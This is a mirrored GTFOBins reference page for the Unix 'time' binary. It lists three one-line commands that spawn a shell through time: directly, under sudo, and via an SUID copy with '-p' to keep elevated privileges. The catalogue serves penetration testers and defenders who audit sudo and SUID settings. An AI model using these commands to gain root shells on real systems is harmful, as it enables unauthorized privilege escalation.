1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/time.md
2018-06-04 17:23:26 +02:00

340 B

description functions
Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
execute-interactive sudo-enabled suid-enabled
code
/usr/bin/time /bin/sh
code
sudo /usr/bin/time /bin/sh
code
./time /bin/sh -p